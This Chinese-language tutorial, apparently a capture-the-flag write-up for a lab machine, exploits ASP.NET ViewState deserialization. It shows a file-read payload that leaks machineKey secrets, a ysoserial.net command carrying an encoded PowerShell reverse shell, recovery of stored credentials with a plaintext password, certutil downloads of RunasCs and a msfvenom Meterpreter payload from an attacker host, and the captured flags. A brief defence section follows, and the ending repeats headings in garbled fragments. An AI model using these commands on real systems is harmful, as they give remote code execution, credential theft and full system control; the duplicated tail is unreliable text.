ASP.NET ViewState 反序列化漏洞利用教学文档<\/h1>

1. 漏洞概述<\/h2>
本教学文档详细分析了一个针对 ASP.NET Web Forms 应用程序中 `__VIEWSTATE<\/code> 参数的反序列化漏洞利用过程。攻击者通过获取服务器配置中的 machineKey<\/code>，利用 ysoserial.net 工具生成恶意 ViewState，最终实现远程代码执行(RCE)并获取系统权限。<\/p>`

2. 初始信息收集<\/h2>
2.1 主机发现与端口扫描<\/h3>
nmap -p- -sC -sV 10.10.11.251 --min-rate 1000<\/span>
<\/span><\/span><\/code><\/pre>2.2 添加主机到hosts文件<\/h3>
echo "10.10.11.251 dev.pov.htb pov.htb"<\/span> >> \/etc\/hosts
<\/span><\/span><\/code><\/pre>3. 漏洞发现与利用<\/h2>
3.1 文件读取漏洞<\/h3>
通过Burp拦截请求，发现存在文件读取漏洞：<\/p>
file=C:\\Windows\win.ini
<\/code><\/pre>
3.2 关键配置文件获取<\/h3>
读取web.config文件获取服务器配置：<\/p>
file=\/web.config
<\/code><\/pre>
获取到关键配置信息：<\/p>
<configuration><\/span>
<\/span><\/span>  <system.web><\/span>
<\/span><\/span>    <customErrors<\/span> mode=<\/span>"On"<\/span> defaultRedirect=<\/span>"default.aspx"<\/span> \/><\/span>
<\/span><\/span>    <httpRuntime<\/span> targetFramework=<\/span>"4.5"<\/span> \/><\/span>
<\/span><\/span>    <machineKey<\/span> 
<\/span><\/span>      decryption=<\/span>"AES"<\/span> 
<\/span><\/span>      decryptionKey=<\/span>"74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43"<\/span> 
<\/span><\/span>      validation=<\/span>"SHA1"<\/span> 
<\/span><\/span>      validationKey=<\/span>"5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"<\/span> \/><\/span>
<\/span><\/span>  <\/system.web><\/span>
<\/span><\/span>  <!-- 其他配置省略 --><\/span>
<\/span><\/span><\/configuration><\/span>
<\/span><\/span><\/code><\/pre>3.3 machineKey 安全风险分析<\/h3>
machineKey<\/code> 元素定义了用于加密和验证 __VIEWSTATE<\/code> 的密钥。攻击者获取这些密钥后可以：<\/p>

伪造或篡改 __VIEWSTATE<\/code><\/li>
执行命令注入<\/li>
实现远程代码执行<\/li>
<\/ol>
4. 漏洞利用过程<\/h2>
4.1 准备 ysoserial.net 工具<\/h3>
wget https:\/\/github.com\/pwntester\/ysoserial.net\/releases\/download\/v1.36\/ysoserial-1dba9c4416ba6e79b6b262b758fa75e2ee9008e9.zip
<\/span><\/span><\/code><\/pre>4.2 生成恶意 ViewState<\/h3>
使用 ysoserial.exe 生成包含 PowerShell 反向 shell 的 ViewState：<\/p>
ysoserial.exe -p ViewState -g TextFormattingRunProperties \
<\/span><\/span>--decryptionalg="AES"<\/span> \
<\/span><\/span>--decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43"<\/span> \
<\/span><\/span>--validationalg="SHA1"<\/span> \
<\/span><\/span>--validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"<\/span> \
<\/span><\/span>--path="\/portfolio\/default.aspx"<\/span> \
<\/span><\/span>-c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMgAzACIALAAxADAAMAAzADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"<\/span>
<\/span><\/span><\/code><\/pre>4.3 替换 ViewState 并触发漏洞<\/h3>
使用 Burp Suite 拦截请求，将生成的恶意 payload 替换 __VIEWSTATE<\/code> 字段。<\/p>
5. 权限提升<\/h2>
5.1 获取用户凭据<\/h3>
在 C:\windows\system32\inetsrv<\/code> 目录下发现 connection.xml<\/code> 文件，包含用户 alaading<\/code> 的加密凭据。<\/p>
解密过程：<\/p>
$EncryptedString = Get-Content .\pass.txt
<\/span><\/span>$SecureString = ConvertTo-SecureString $EncryptedString
<\/span><\/span>$Credential = New-Object System.Management.Automation.PSCredential -ArgumentList "username"<\/span>,$SecureString
<\/span><\/span>echo $Credential.GetNetworkCredential().password
<\/span><\/span><\/code><\/pre>获取明文密码：<\/p>
username: alaading
password: f8gQ8fynP44ek1m3
<\/code><\/pre>
5.2 使用 RunasCs 提权<\/h3>
下载并执行 RunasCs：<\/p>
certutil.exe -urlcache -split -f<\/span> "http:\/\/10.10.16.23\/RunasCs.exe"<\/span> ".\RunasCs.exe"<\/span>
<\/span><\/span>.\RunasCs.exe alaading f8gQ8fynP44ek1m3 powershell.exe -r 10.10.16.23:<\/span>10034
<\/span><\/span><\/code><\/pre>5.3 获取用户 flag<\/h3>
type C:\Users\alaading\Desktop\user.txt
2087672b9f87f406e8a45c5dc16fe3f4
<\/code><\/pre>
6. 获取系统权限<\/h2>
6.1 生成 Meterpreter payload<\/h3>
msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<\/span>10.10.16.23 LPORT=<\/span>10099<\/span> -f exe > exp.exe
<\/span><\/span><\/code><\/pre>6.2 设置监听<\/h3>
msfconsole -x 'use exploit\/multi\/handler;set PAYLOAD windows\/meterpreter\/reverse_tcp;set LHOST 10.10.16.23;set LPORT 10099;run'<\/span>
<\/span><\/span><\/code><\/pre>6.3 靶机执行 payload<\/h3>
certutil.exe -urlcache -split -f<\/span> "http:\/\/10.10.16.23\/exp.exe"<\/span> ".\exp.exe"<\/span>
<\/span><\/span>.\exp.exe
<\/span><\/span><\/code><\/pre>6.4 进程迁移提权<\/h3>
meterpreter > migrate 540<\/span>  # 迁移到winlogon.exe进程<\/span>
<\/span><\/span><\/code><\/pre>6.5 获取 root flag<\/h3>
type c:\users\administrator\desktop\root.txt
1069913b5adede5be3eaa21feecf660c
<\/code><\/pre>
7. 防御措施<\/h2>


保护 machineKey<\/strong>:<\/p>

不要将 machineKey 明文存储在配置文件中<\/li>
定期轮换加密密钥<\/li>
使用自动生成的密钥而非硬编码密钥<\/li>
<\/ul>
<\/li>

ViewState 安全配置<\/strong>:<\/p>

启用 ViewState MAC (Message Authentication Code)<\/li>
设置 ViewState 加密<\/li>
限制 ViewState 大小<\/li>
<\/ul>
<\/li>

其他安全措施<\/strong>:<\/p>

实施适当的输入验证<\/li>
使用最新的安全补丁更新 .NET 框架<\/li>
限制敏感信息的存储位置<\/li>
实施最小权限原则<\/li>
<\/ul>
<\/li>
<\/ol>

ASP.NET ViewState 反序列化漏洞利用教学文档<\/h1>

3. 漏洞发现与利用<\/h2>

4. 漏洞利用过程<\/h2>

4.3 替换 ViewState 并触发漏洞<\/h3> 使用 Burp Suite 拦截请求，将生成的恶意 payload 替换 __VIEWSTATE<\/code> 字段。<\/p>

6. 获取系统权限<\/h2>

4.3 替换 ViewState 并触发漏洞<\/h3>
使用 Burp Suite 拦截请求，将生成的恶意 payload 替换 `__VIEWSTATE<\/code> 字段。<\/p>`